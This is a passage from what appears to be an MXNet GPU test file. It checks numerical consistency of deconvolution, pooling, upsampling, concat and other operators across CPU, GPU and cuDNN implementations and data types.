sym_no_cudnn = mx.sym.Deconvolution(num_filter=3, kernel=(3,), stride=(2,), cudnn_off=True, name='deconv')
check_consistency_NxM([sym, sym_no_cudnn], ctx_list)
# Dilate > 1
sym = mx.sym.Deconvolution(layout='NCW', num_filter=3, kernel=(3,), dilate=(2,), name='deconv')
sym_no_cudnn = mx.sym.Deconvolution(num_filter=3, kernel=(3,), dilate=(2,), cudnn_off=True, name='deconv')
check_consistency_NxM([sym, sym_no_cudnn], ctx_list)
# 2D deconvolution
ctx_list = [{'ctx': mx.gpu(0), 'deconv_data': (2, 8, 10, 10), 'type_dict': {'deconv_data': np.float64}},
{'ctx': mx.gpu(0), 'deconv_data': (2, 8, 10, 10), 'type_dict': {'deconv_data': np.float32}},
{'ctx': mx.gpu(0), 'deconv_data': (2, 8, 10, 10), 'type_dict': {'deconv_data': np.float16}},
{'ctx': mx.cpu(0), 'deconv_data': (2, 8, 10, 10), 'type_dict': {'deconv_data': np.float64}},
{'ctx': mx.cpu(0), 'deconv_data': (2, 8, 10, 10), 'type_dict': {'deconv_data': np.float32}}]
# Pad > 0
sym = mx.sym.Deconvolution(num_filter=2, kernel=(3,3), pad=(1,1), name='deconv')
sym_no_cudnn = mx.sym.Deconvolution(num_filter=2, kernel=(3,3), pad=(1,1), cudnn_off=True, name='deconv')
check_consistency_NxM([sym, sym_no_cudnn], ctx_list)
# Stride > 1
sym = mx.sym.Deconvolution(num_filter=2, kernel=(3,3), stride=(2,2), name='deconv')
sym_no_cudnn = mx.sym.Deconvolution(num_filter=2, kernel=(3,3), stride=(2,2), cudnn_off=True, name='deconv')
check_consistency_NxM([sym, sym_no_cudnn], ctx_list)
# Dilate > 1
sym = mx.sym.Deconvolution(num_filter=2, kernel=(3,3), dilate=(2,2), name='deconv')
sym_no_cudnn = mx.sym.Deconvolution(num_filter=2, kernel=(3,3), dilate=(2,2), cudnn_off=True, name='deconv')
check_consistency_NxM([sym, sym_no_cudnn], ctx_list)
# # 3D deconvolution (not yet enabled)
# ctx_list = [{'ctx': mx.cpu(0), 'conv_data': (2, 2, 5, 7, 7), 'type_dict': {'conv_data': np.float64}},
# {'ctx': mx.cpu(0), 'conv_data': (2, 2, 5, 7, 7), 'type_dict': {'conv_data': np.float64}},
# {'ctx': mx.gpu(0), 'conv_data': (2, 2, 5, 7, 7), 'type_dict': {'conv_data': np.float64}},
# {'ctx': mx.gpu(0), 'conv_data': (2, 2, 5, 7, 7), 'type_dict': {'conv_data': np.float32}}]
# # Pad > 0
# sym = mx.sym.Convolution(num_filter=3, kernel=(2,3,3), pad=(1,1,1), name='conv')
# sym_no_cudnn = mx.sym.Convolution(num_filter=3, kernel=(2,3,3), pad=(1,1,1), cudnn_off=True, name='conv')
# check_consistency_NxM([sym, sym_no_cudnn], ctx_list)
# # Stride > 1
# sym = mx.sym.Convolution(num_filter=3, kernel=(2,3,3), stride=(2,2,2), name='conv')
# sym_no_cudnn = mx.sym.Convolution(num_filter=3, kernel=(2,3,3), stride=(2,2,2), cudnn_off=True, name='conv')
# check_consistency_NxM([sym, sym_no_cudnn], ctx_list)
@with_seed(1234)
def test_bilinear_sampler_with_type():
data = mx.sym.Variable('data')
grid = mx.sym.Variable('grid')
sym = mx.sym.BilinearSampler(data=data, grid=grid)
ctx_list = [{'ctx': mx.gpu(0), 'data': (1, 5, 10, 10), 'grid': (1, 2, 10, 10),
'type_dict': {'data': np.float64}},
{'ctx': mx.gpu(0), 'data': (1, 5, 10, 10), 'grid': (1, 2, 10, 10),
'type_dict': {'data': np.float32}},
{'ctx': mx.gpu(0), 'data': (1, 5, 10, 10), 'grid': (1, 2, 10, 10),
'type_dict': {'data': np.float16}},
{'ctx': mx.cpu(0), 'data': (1, 5, 10, 10), 'grid': (1, 2, 10, 10),
'type_dict': {'data': np.float64}},
{'ctx': mx.cpu(0), 'data': (1, 5, 10, 10), 'grid': (1, 2, 10, 10),
'type_dict': {'data': np.float32}}]
check_consistency(sym, ctx_list)
check_consistency(sym, ctx_list, grad_req="add")
@with_seed()
def test_grid_generator_with_type():
data = mx.sym.Variable('data')
sym = mx.sym.GridGenerator(data=data, transform_type='affine', target_shape=(20, 20))
ctx_list = [{'ctx': mx.gpu(0), 'data': (3, 6), 'type_dict': {'data': np.float32}},
{'ctx': mx.cpu(0), 'data': (3, 6), 'type_dict': {'data': np.float32}}]
check_consistency(sym, ctx_list)
check_consistency(sym, ctx_list, grad_req="add")
sym = mx.sym.GridGenerator(data=data, transform_type='warp', target_shape=(20, 20))
ctx_list = [{'ctx': mx.gpu(0), 'data': (3, 2, 20, 20), 'type_dict': {'data': np.float32}},
{'ctx': mx.cpu(0), 'data': (3, 2, 20, 20), 'type_dict': {'data': np.float32}}]
check_consistency(sym, ctx_list)
check_consistency(sym, ctx_list, grad_req="add")
@with_seed()
def test_spatial_transformer_with_type():
data = mx.sym.Variable('data')
loc = mx.sym.Flatten(data)
loc = mx.sym.FullyConnected(data=loc, num_hidden=10)
loc = mx.sym.Activation(data=loc, act_type='relu')
loc = mx.sym.FullyConnected(data=loc, num_hidden=6)
sym = mx.sym.SpatialTransformer(data=data, loc=loc, target_shape=(10, 10),
transform_type="affine", sampler_type="bilinear", cudnn_off=True)
ctx_list = [{'ctx': mx.gpu(0), 'data': (1, 5, 10, 10), 'type_dict': {'data': np.float64}},
{'ctx': mx.cpu(0), 'data': (1, 5, 10, 10), 'type_dict': {'data': np.float64}}]
check_consistency(sym, ctx_list)
check_consistency(sym, ctx_list, grad_req="add")
sym = mx.sym.SpatialTransformer(data=data, loc=loc, target_shape=(10, 10),
transform_type="affine", sampler_type="bilinear", cudnn_off=False)
check_consistency(sym, ctx_list)
check_consistency(sym, ctx_list, grad_req="add")
@with_seed()
def test_pooling_with_type2():
# While the float32 and float64 output is reliably consistent, float16 departs occasionally.
# We compare cpu and gpu results only within a given precision.
for data_type in [np.float64, np.float32, np.float16]:
ctx_list = [{'ctx': mx.gpu(0), 'pool_data': (10, 2, 10, 10), 'type_dict': {'pool_data': data_type}},
{'ctx': mx.cpu(0), 'pool_data': (10, 2, 10, 10), 'type_dict': {'pool_data': data_type}}]
sym = mx.sym.Pooling(name='pool', kernel=(3,3), stride=(2,2), pool_type='max')
check_consistency(sym, ctx_list)
sym = mx.sym.Pooling(name='pool', kernel=(3,3), pad=(1,1), pool_type='avg')
check_consistency(sym, ctx_list)
sym = mx.sym.Pooling(name='pool', kernel=(5,5), pad=(2,2), pool_type='max')
check_consistency(sym, ctx_list)
sym = mx.sym.Pooling(name='pool', kernel=(3,3), pad=(1,1), pool_type='sum')
check_consistency(sym, ctx_list)
@with_seed()
def test_pooling_nhwc_with_type():
def make_pooling_syms(**kwargs):
# Conventional NCHW layout pooling
sym = mx.sym.Pooling(**kwargs)
# NHWC pooling
data = mx.sym.Variable('pool_data')
sym_nhwc = mx.sym.transpose(data, axes=(0,2,3,1))
sym_nhwc = mx.sym.Pooling(sym_nhwc, layout='NHWC', **kwargs)
sym_nhwc = mx.sym.transpose(sym_nhwc, axes=(0,3,1,2), name='pool')
return [sym, sym_nhwc]
# While the float32 and float64 output is reliably consistent, float16 departs occasionally.
# We compare nhwc and nchw results only within a given precision.
for data_type in [np.float64, np.float32, np.float16]:
# NHWC pooling only enabled on GPU with CUDNN
ctx_list = [{'ctx': mx.gpu(0), 'pool_data': (10, 2, 10, 10), 'type_dict': {'pool_data': data_type}}]
symlist = make_pooling_syms(name='pool', kernel=(3,3), stride=(2,2), pool_type='max')
check_consistency_NxM(symlist, ctx_list)
symlist = make_pooling_syms(name='pool', kernel=(3,3), pad=(1,1), pool_type='avg')
check_consistency_NxM(symlist, ctx_list)
symlist = make_pooling_syms(name='pool', kernel=(5,5), pad=(2,2), pool_type='max')
check_consistency_NxM(symlist, ctx_list)
@with_seed()
def test_pooling_versions():
# Produce the name of the 'transposed' layout, given the dimension
def transposed_layout(ndim):
if ndim < 3 or ndim > 5:
raise RuntimeError("Invalid data dim, expecting 3, 4 or 5")
return ('NWC', 'NHWC', 'NDHWC')[ndim-3]
# default padding is all zeros
def is_default_pad(pad):
return pad == (0,) * len(pad)
# default stride is all ones
def is_default_stride(stride):
return stride == (1,) * len(stride)
# returns True/False randomly with equal probability
def random_choice():
return np.random.random(1)[0] < 0.5
def test_pooling_versions_helper(pool_op_list, data, kernel, pool_type, pad, stride,
pooling_convention='valid', global_pool=False, p_value=2,
count_include_pad=True, tol=None, dtype=np.float32):
ctx_list = []
sym_list = []
for pool_ctx in pool_op_list:
(pool_op, ctx_type) = pool_ctx.rsplit('_', 1)
expected_ctxs = ['cpu', 'gpu', 'cudnn']
if ctx_type not in expected_ctxs:
raise RuntimeError('Expected one of {}, saw {}.'.format(expected_ctxs, ctx_type))
ctx = mx.cpu(0) if ctx_type == 'cpu' else mx.gpu(0)
ctx_list.append({'ctx': ctx, 'pool_data': data, 'type_dict': {'pool_data': dtype}})
# start with pool args present in all cases
pool_op_args = {'kernel': kernel, 'pool_type': pool_type,
'pooling_convention' : pooling_convention, 'name' : 'pool'}
# add other args as needed
if global_pool:
pool_op_args['global_pool'] = True
else:
# Add pad and stride param if needed, plus randomly when it matches the default
if not is_default_pad(pad) or random_choice():
pool_op_args.update({'pad' : pad})
if not is_default_stride(stride) or random_choice():
pool_op_args.update({'stride' : stride})
expected_pool_ops = ['pool', 'pool_transposed', 'pool_v1']
if pool_op == 'pool_v1':
sym = mx.sym.Pooling_v1(**pool_op_args)
else:
pool_op_args.update({'p_value' : p_value, 'count_include_pad' : count_include_pad})
if ctx_type != 'cpu':
pool_op_args['cudnn_off'] = ctx_type == 'gpu'
if pool_op == 'pool':
# isolate pooling input from symbol input to test shared tensor optimizations
buffered_input = mx.sym.identity(name='pool')
sym = mx.sym.Pooling(buffered_input, **pool_op_args)
elif pool_op == 'pool_transposed':
ndim = len(data)
# NCW->NWC axes=(0,2,1) NCHW->NHWC axes=(0,2,3,1) NCDHW->NDHWC axes=(0,2,3,4,1);
axes = (0,) + tuple(range(2,ndim)) + (1,)
transposed = mx.sym.transpose(axes=axes, name='pool')
pooled = mx.sym.Pooling(data=transposed, layout=transposed_layout(ndim),
**pool_op_args)
# NWC->NCW axes=(0,2,1) NHWC->NCHW axes=(0,3,1,2) NDHWC->NCDHW axes=(0,4,1,2,3);
axes = (0, ndim-1) + tuple(range(1,ndim-1))
sym = mx.sym.transpose(data=pooled, axes=axes, name='pool')
else:
raise RuntimeError('Expected one of {}, saw {}.'.format(expected_pool_ops,
pool_op))
sym_list.append(sym)
check_consistency(sym_list, ctx_list, equal_nan=(not count_include_pad), tol=tol)
def test_pooling_dim(dim, pool_type, dtype, pool_op_list, p_value=2, count_include_pad=True,
tol=None):
if dim == '1D':
data = (3, 3, 10)
kernels = [(4,), (4,), (5,)]
pads = [(0,), (2,), (2,)]
strides = [(1,), (2,), (1,)]
elif dim == '2D_no_padding':
data = (3, 2, 20, 20)
kernels = [(3, 3), (4, 5)]
pads = [(0, 0), (0, 0)]
strides = [(1, 1), (2, 1)]
elif dim == '2D':
data = (2, 2, 20, 20)
kernels = [(3, 3), (3, 5), (4, 5), (4, 5)]
pads = [(0, 0), (1, 2), (0, 0), (2, 3)]
strides = [(1, 1), (1, 1), (2, 1), (1, 1)]
elif dim == '3D':
data = (2, 3, 20, 20, 20)
kernels = [(4, 5, 3), (4, 5, 3), (3, 5, 7)]
pads = [(0, 0, 0), (2, 3, 2), (1, 2, 3)]
strides = [(1, 1, 1), (2, 3, 1), (1, 1, 1)]
else:
raise RuntimeError('Unexpected pooling test class: {}.'.format(dim))
for kernel, pad, stride in zip(kernels, pads, strides):
for pooling_convention in ['valid', 'full']:
try:
test_pooling_versions_helper(pool_op_list=pool_op_list,
data=data, kernel=kernel, pad=pad, stride=stride,
pool_type=pool_type, pooling_convention=pooling_convention,
global_pool=False, p_value=p_value,
count_include_pad=count_include_pad, tol=tol, dtype=dtype)
except:
print('pool_op_list = {}'.format(pool_op_list))
print('kernel={}, pad={}, stride={}'.format(kernel, pad, stride))
print('pool_type={}, pooling_convention={}, global_pool=False'.format(pool_type,
pooling_convention))
print('p_value={}, count_include_pad={}, dtype={}'.format(p_value,
count_include_pad, dtype))
print('environ = \n{}'.format(os.environ))
raise
# Make sure kernel is ignored during global_pool by sometimes setting it to a crazy value
kernel = kernels[0]
if random_choice():
kernel = (300,) * len(kernel)
test_pooling_versions_helper(pool_op_list=pool_op_list,
data=data, kernel=kernel, pad=None, stride=None,
pool_type=pool_type, global_pool=True, p_value=p_value,
count_include_pad=count_include_pad, tol=tol, dtype=dtype)
# The various implementations of the standard pooling operator
std_pool_op_list = ['pool_cpu', 'pool_transposed_cpu',
'pool_gpu', 'pool_transposed_gpu',
'pool_cudnn', 'pool_transposed_cudnn']
# The implementations of the 'v1' pooling operator
v1_pool_op_list = ['pool_v1_cpu', 'pool_v1_gpu']
# For those cases when all implementations should match- the combined implementation list.
combo_pool_op_list = std_pool_op_list + v1_pool_op_list
for dtype in [np.float32, np.float64, np.float16]:
# Testing of the standard (not 'v1') pooling operator is universal across all
# data dimensions, implementations and layouts.
for dim in ['1D', '2D', '3D']:
test_pooling_dim(dim, 'max', dtype, std_pool_op_list)
test_pooling_dim(dim, 'avg', dtype, std_pool_op_list, count_include_pad=True)
test_pooling_dim(dim, 'avg', dtype, std_pool_op_list, count_include_pad=False)
test_pooling_dim(dim, 'sum', dtype, std_pool_op_list)
test_pooling_dim(dim, 'lp', dtype, std_pool_op_list, p_value=1)
test_pooling_dim(dim, 'lp', dtype, std_pool_op_list, p_value=2)
test_pooling_dim(dim, 'lp', dtype, std_pool_op_list, p_value=3)
# Testing of the 'v1' pooling operator is over its restricted support domain of
# 2D data only and not with the 'lp' pooling type. The 'v1' cpu and gpu versions are
# always tested against each other, and sometimes against the standard operator versions.
# The slightly different 'v1' definition prevents this in the following cases:
#
# 1. In max pooling, when multiple input values are the maximum in the input window,
# the 'v1' implementation backprops the gradient to all maxima, whereas the standard
# pooling operator backprops the gradient to the lowest-indexed maximum only.
# 2. In max pooling, the 'v1' operator pads with 0's and this value can become the
# maximum output value in the case of an all-negative input. The standard pooling
# operator effectively considers the padding to be the largest negative value, so
# only input values should appear in the output.
# 3. In avg pooling, the 'v1' operator divides the sum by the same window size factor,
# even at the edges, and so does not support count_include_pad = False.
# 4. The float16 'v1' pooling operator performs forward sums and averages in
# float16, whereas the std operators perform those calculations in float32, so
# greater float16 tolerances are needed when comparing across implementations.
# Double the float16 tol when comparing v1 and non-v1 implemenations, per note 4 above.
relaxed_tol = {np.dtype(np.float16): 2e-1,
np.dtype(np.float32): 1e-3,
np.dtype(np.float64): 1e-5,
np.dtype(np.uint8): 0,
np.dtype(np.int32): 0,
np.dtype(np.int64): 0}
# Exclude std implementations due to points 1 and 2 above.
test_pooling_dim('2D', 'max', dtype, v1_pool_op_list)
# The standard and 'v1' implementations match for this case.
test_pooling_dim('2D', 'avg', dtype, combo_pool_op_list, count_include_pad=True,
tol=relaxed_tol)
# Exclude std implementations due to point 3 above.
test_pooling_dim('2D', 'avg', dtype, v1_pool_op_list, count_include_pad=False)
# The standard and 'v1' implementations match for this case.
test_pooling_dim('2D', 'sum', dtype, combo_pool_op_list, tol=relaxed_tol)
# We can compare the standard and 'v1' max pooling implementations if we eliminate padding
# (see point 2 above) and use np.float64 data so that no two random input window values are
# likely to be the same (see point 1 above).
test_pooling_dim('2D_no_padding', 'max', np.float64, combo_pool_op_list)
@with_seed()
def test_pooling_full_2d():
def test_pooling_full_2d_type(pool_type):
data = (2, 2, 10, 10)
kernel = (4, 5)
pad = (1, 2)
stride = (3, 4)
convention = 'full'
ctx_list = []
sym_list = []
# o_h = ceil((10 + 1 + 1 - 4) / 3) + 1 = 4
# o_w = ceil((10 + 2 + 2 - 5) / 4) + 1 = 4
ctx_list.append({'ctx': mx.cpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}})
sym_list.append(mx.sym.Pooling(kernel=kernel, pad=pad, stride=stride, pool_type=pool_type,
pooling_convention=convention, global_pool=False, name='pool'))
ctx_list.append({'ctx': mx.gpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}})
sym_list.append(mx.sym.Pooling(kernel=kernel, pad=pad, stride=stride, pool_type=pool_type,
pooling_convention=convention, global_pool=False, name='pool'))
check_consistency(sym_list, ctx_list)
test_pooling_full_2d_type('max')
test_pooling_full_2d_type('avg')
test_pooling_full_2d_type('sum')
@with_seed()
def test_flatten_slice_after_conv():
ctx_list = []
data = mx.sym.Variable('conv_data')
conv = mx.symbol.Convolution(data=data, name='conv', num_filter=16, kernel=(3,3), stride=(1,1))
flatten = mx.symbol.flatten(data=conv)
slice_sym = mx.symbol.slice(data=flatten, begin=0, end=1)
ctx_list = [{'ctx': mx.gpu(0), 'conv_data': (2, 16, 16, 16), 'type_dict': {'conv_data': np.float32}},
{'ctx': mx.cpu(0), 'conv_data': (2, 16, 16, 16), 'type_dict': {'conv_data': np.float32}}]
check_consistency(slice_sym, ctx_list)
@with_seed()
def test_bilinear_resize_op():
ctx_list = [{'ctx': mx.cpu(0), 'data': (2, 2, 20, 20), 'type_dict': {'data': np.float32}},
{'ctx': mx.gpu(0), 'data': (2, 2, 20, 20), 'type_dict': {'data': np.float32}}]
data = mx.sym.Variable('data')
sym = mx.sym.contrib.BilinearResize2D(data, height=10, width=5, align_corners=True)
check_consistency(sym, ctx_list)
sym = mx.sym.contrib.BilinearResize2D(data, height=10, width=5, align_corners=False)
check_consistency(sym, ctx_list)
sym = mx.sym.contrib.BilinearResize2D(data, None, scale_height=2, scale_width=0.5, mode='odd_scale', align_corners=True)
check_consistency(sym, ctx_list)
sym = mx.sym.contrib.BilinearResize2D(data, None, scale_height=2, scale_width=0.5, mode='odd_scale', align_corners=False)
check_consistency(sym, ctx_list)
sym = mx.sym.contrib.BilinearResize2D(data, None, scale_height=0.5, scale_width=2, mode='to_even_up', align_corners=True)
check_consistency(sym, ctx_list)
sym = mx.sym.contrib.BilinearResize2D(data, None, scale_height=0.5, scale_width=2, mode='to_even_up', align_corners=False)
check_consistency(sym, ctx_list)
@with_seed()
def test_global_pooling():
def test_1d_pooling(pool_type, p_value=2):
data = (2, 3, 20)
kernel = (4,)
pad = (2,)
stride = (2,)
ctx_list = []
sym_list = []
pooling_convention = 'valid'
ctx_list.append({'ctx': mx.cpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}})
sym_list.append(mx.sym.Pooling(kernel=kernel, pad=pad, stride=stride, pool_type=pool_type,
pooling_convention=pooling_convention, global_pool=True, name='pool', p_value=p_value))
ctx_list.append({'ctx': mx.cpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}})
sym_list.append(mx.sym.Pooling(kernel=kernel, pool_type=pool_type,
pooling_convention=pooling_convention, global_pool=True, name='pool', p_value=p_value))
ctx_list.append({'ctx': mx.cpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}})
sym_list.append(mx.sym.Pooling(pool_type=pool_type,
pooling_convention=pooling_convention, global_pool=True, name='pool', p_value=p_value))
ctx_list.append({'ctx': mx.gpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}})
sym_list.append(mx.sym.Pooling(kernel=kernel, pad=pad, stride=stride, pool_type=pool_type,
pooling_convention=pooling_convention, global_pool=True, p_value=p_value, cudnn_off=False, name='pool'))
ctx_list.append({'ctx': mx.gpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}})
sym_list.append(mx.sym.Pooling(kernel=kernel, pool_type=pool_type,
pooling_convention=pooling_convention, global_pool=True, p_value=p_value, cudnn_off=False, name='pool'))
ctx_list.append({'ctx': mx.gpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}})
sym_list.append(mx.sym.Pooling(pool_type=pool_type,
pooling_convention=pooling_convention, global_pool=True, p_value=p_value, cudnn_off=False, name='pool'))
ctx_list.append({'ctx': mx.gpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}})
sym_list.append(mx.sym.Pooling(kernel=kernel, pad=pad, stride=stride, pool_type=pool_type,
pooling_convention=pooling_convention, global_pool=True, p_value=p_value, cudnn_off=True, name='pool'))
ctx_list.append({'ctx': mx.gpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}})
sym_list.append(mx.sym.Pooling(kernel=kernel, pool_type=pool_type,
pooling_convention=pooling_convention, global_pool=True, p_value=p_value, cudnn_off=True, name='pool'))
ctx_list.append({'ctx': mx.gpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}})
sym_list.append(mx.sym.Pooling(pool_type=pool_type,
pooling_convention=pooling_convention, global_pool=True, p_value=p_value, cudnn_off=True, name='pool'))
check_consistency(sym_list, ctx_list)
def test_2d_pooling(pool_type, p_value=2):
data = (2, 3, 20, 20)
kernel = (4, 4)
pad = (2, 2)
stride = (2, 2)
ctx_list = []
sym_list = []
pooling_convention = 'valid'
if pool_type != 'lp':
ctx_list.append({'ctx': mx.cpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}})
sym_list.append(mx.sym.Pooling_v1(kernel=kernel, pad=pad, stride=stride, pool_type=pool_type,
pooling_convention=pooling_convention, global_pool=True, name='pool'))
ctx_list.append({'ctx': mx.cpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}})
sym_list.append(mx.sym.Pooling_v1(kernel=kernel, pool_type=pool_type,
pooling_convention=pooling_convention, global_pool=True, name='pool'))
ctx_list.append({'ctx': mx.cpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}})
sym_list.append(mx.sym.Pooling_v1(pool_type=pool_type,
pooling_convention=pooling_convention, global_pool=True, name='pool'))
ctx_list.append({'ctx': mx.cpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}})
sym_list.append(mx.sym.Pooling(kernel=kernel, pad=pad, stride=stride, pool_type=pool_type,
pooling_convention=pooling_convention, global_pool=True, p_value=p_value, name='pool'))
ctx_list.append({'ctx': mx.cpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}})
sym_list.append(mx.sym.Pooling(kernel=kernel, pool_type=pool_type,
pooling_convention=pooling_convention, global_pool=True, p_value=p_value, name='pool'))
ctx_list.append({'ctx': mx.cpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}})
sym_list.append(mx.sym.Pooling(pool_type=pool_type,
pooling_convention=pooling_convention, global_pool=True, p_value=p_value, name='pool'))
ctx_list.append({'ctx': mx.gpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}})
sym_list.append(mx.sym.Pooling(kernel=kernel, pad=pad, stride=stride, pool_type=pool_type,
pooling_convention=pooling_convention, global_pool=True, p_value=p_value, cudnn_off=False, name='pool'))
ctx_list.append({'ctx': mx.gpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}})
sym_list.append(mx.sym.Pooling(kernel=kernel, pool_type=pool_type,
pooling_convention=pooling_convention, global_pool=True, p_value=p_value, cudnn_off=False, name='pool'))
ctx_list.append({'ctx': mx.gpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}})
sym_list.append(mx.sym.Pooling(pool_type=pool_type,
pooling_convention=pooling_convention, global_pool=True, p_value=p_value, cudnn_off=False, name='pool'))
ctx_list.append({'ctx': mx.gpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}})
sym_list.append(mx.sym.Pooling(kernel=kernel, pad=pad, stride=stride, pool_type=pool_type,
pooling_convention=pooling_convention, global_pool=True, p_value=p_value, cudnn_off=True, name='pool'))
ctx_list.append({'ctx': mx.gpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}})
sym_list.append(mx.sym.Pooling(kernel=kernel, pool_type=pool_type,
pooling_convention=pooling_convention, global_pool=True, p_value=p_value, cudnn_off=True, name='pool'))
ctx_list.append({'ctx': mx.gpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}})
sym_list.append(mx.sym.Pooling(pool_type=pool_type,
pooling_convention=pooling_convention, global_pool=True, p_value=p_value, cudnn_off=True, name='pool'))
check_consistency(sym_list, ctx_list)
test_1d_pooling('max')
test_1d_pooling('avg')
test_1d_pooling('sum')
test_1d_pooling('lp', p_value=1)
test_1d_pooling('lp', p_value=2)
test_1d_pooling('lp', p_value=3)
test_2d_pooling('max')
test_2d_pooling('avg')
test_2d_pooling('sum')
test_2d_pooling('lp', p_value=1)
test_2d_pooling('lp', p_value=2)
test_2d_pooling('lp', p_value=3)
@with_seed()
def test_upsampling_with_type():
sym = mx.sym.UpSampling(scale=2, num_filter=2, name='up', sample_type='nearest', num_args=1)
ctx_list = [{'ctx': mx.gpu(0), 'up_arg0': (2, 2, 2, 10), 'type_dict': {'up_arg0': np.float64}},
{'ctx': mx.gpu(0), 'up_arg0': (2, 2, 2, 10), 'type_dict': {'up_arg0': np.float32}},
{'ctx': mx.gpu(0), 'up_arg0': (2, 2, 2, 10), 'type_dict': {'up_arg0': np.float16}},
{'ctx': mx.cpu(0), 'up_arg0': (2, 2, 2, 10), 'type_dict': {'up_arg0': np.float64}},
{'ctx': mx.cpu(0), 'up_arg0': (2, 2, 2, 10), 'type_dict': {'up_arg0': np.float32}}]
check_consistency(sym, ctx_list)
@with_seed()
def test_upsampling_bilinear_with_type():
sym = mx.sym.UpSampling(scale=2, num_filter=2, name='up', sample_type='bilinear', num_args=1)
ctx_list = [{'ctx': mx.gpu(0), 'up_data': (2, 2, 2, 10), 'type_dict': {'up_data': np.float64}},
{'ctx': mx.gpu(0), 'up_data': (2, 2, 2, 10), 'type_dict': {'up_data': np.float32}},
{'ctx': mx.gpu(0), 'up_data': (2, 2, 2, 10), 'type_dict': {'up_data': np.float16}},
{'ctx': mx.cpu(0), 'up_data': (2, 2, 2, 10), 'type_dict': {'up_data': np.float64}},
{'ctx': mx.cpu(0), 'up_data': (2, 2, 2, 10), 'type_dict': {'up_data': np.float32}}]
check_consistency(sym, ctx_list)
@with_seed()
def test_concat_with_type():
sym = mx.sym.Concat(name='concat', num_args=2)
ctx_list = [{'ctx': mx.gpu(0), 'concat_arg1': (2, 10), 'concat_arg0': (2, 10),
'type_dict': {'concat_arg0': np.float64, 'concat_arg1': np.float64}},
{'ctx': mx.gpu(0), 'concat_arg1': (2, 10), 'concat_arg0': (2, 10),
'type_dict': {'concat_arg0': np.float32, 'concat_arg1': np.float32}},
{'ctx': mx.gpu(0), 'concat_arg1': (2, 10), 'concat_arg0': (2, 10),
'type_dict': {'concat_arg0': np.float16, 'concat_arg1': np.float16}},
{'ctx': mx.cpu(0), 'concat_arg1': (2, 10), 'concat_arg0': (2, 10),
'type_dict': {'concat_arg0': np.float64, 'concat_arg1': np.float64}},
{'ctx': mx.cpu(0), 'concat_arg1': (2, 10), 'concat_arg0': (2, 10),
'type_dict': {'concat_arg0': np.float32, 'concat_arg1': np.float32}}]
check_consistency(sym, ctx_list)
@with_seed()
def test_elementwisesum_with_type():
dev_types = [[mx.gpu(0), [np.float64, np.float32, np.float16]],
[mx.cpu(0), [np.float64, np.float32]] ]
for num_args in range(1, 6):
ews_arg_shape = {}
for i in range(num_args):
ews_arg_shape['ews_arg'+str(i)] = (2, 10)
sym = mx.sym.ElementWiseSum(name='ews', num_args=num_args)
ctx_list = []
for dev, types in dev_types:
for dtype in types:
ews_arg_dtype = {'type_dict':{}}
for i in range(num_args):
ews_arg_dtype['type_dict']['ews_arg'+str(i)] = dtype
ctx_elem = {'ctx': dev}
ctx_elem.update(ews_arg_shape)
ctx_elem.update(ews_arg_dtype)
ctx_list.append(ctx_elem)
check_consistency(sym, ctx_list)
@with_seed()
def test_reshape_with_type():
sym = mx.sym.Reshape(name='reshape', shape=(-1,1,1,0))
ctx_list = [{'ctx': mx.gpu(0), 'reshape_data': (2, 2, 2, 10), 'type_dict': {'reshape_data': np.float64}},
{'ctx': mx.gpu(0), 'reshape_data': (2, 2, 2, 10), 'type_dict': {'reshape_data': np.float32}},
{'ctx': mx.gpu(0), 'reshape_data': (2, 2, 2, 10), 'type_dict': {'reshape_data': np.float16}},
{'ctx': mx.cpu(0), 'reshape_data': (2, 2, 2, 10), 'type_dict': {'reshape_data': np.float64}},
{'ctx': mx.cpu(0), 'reshape_data': (2, 2, 2, 10), 'type_dict': {'reshape_data': np.float32}}]
check_consistency(sym, ctx_list)
@with_seed()
def test_blockgrad_with_type():
sym = mx.sym.BlockGrad(name='bg')
ctx_list = [{'ctx': mx.gpu(0), 'bg_data': (2, 2, 2, 10), 'type_dict': {'bg_data': np.float64}},
{'ctx': mx.gpu(0), 'bg_data': (2, 2, 2, 10), 'type_dict': {'bg_data': np.float32}},
{'ctx': mx.gpu(0), 'bg_data': (2, 2, 2, 10), 'type_dict': {'bg_data': np.float16}},
{'ctx': mx.cpu(0), 'bg_data': (2, 2, 2, 10), 'type_dict': {'bg_data': np.float64}},
{'ctx': mx.cpu(0), 'bg_data': (2, 2, 2, 10), 'type_dict': {'bg_data': np.float32}}]
check_consistency(sym, ctx_list)
@with_seed()
def test_swapaxis_with_type():
sym = mx.sym.SwapAxis(name='swap', dim1=1)
ctx_list = [{'ctx': mx.gpu(0), 'swap_data': (2, 2, 2, 10), 'type_dict': {'swap_data': np.float64}},
{'ctx': mx.gpu(0), 'swap_data': (2, 2, 2, 10), 'type_dict': {'swap_data': np.float32}},
{'ctx': mx.gpu(0), 'swap_data': (2, 2, 2, 10), 'type_dict': {'swap_data': np.float16}},
{'ctx': mx.cpu(0), 'swap_data': (2, 2, 2, 10), 'type_dict': {'swap_data': np.float64}},
{'ctx': mx.cpu(0), 'swap_data': (2, 2, 2, 10), 'type_dict': {'swap_data': np.float32}}]
check_consistency(sym, ctx_list)
@with_seed()
def test_fullyconnected_with_type():
sym = mx.sym.FullyConnected(num_hidden=3, name='inner')
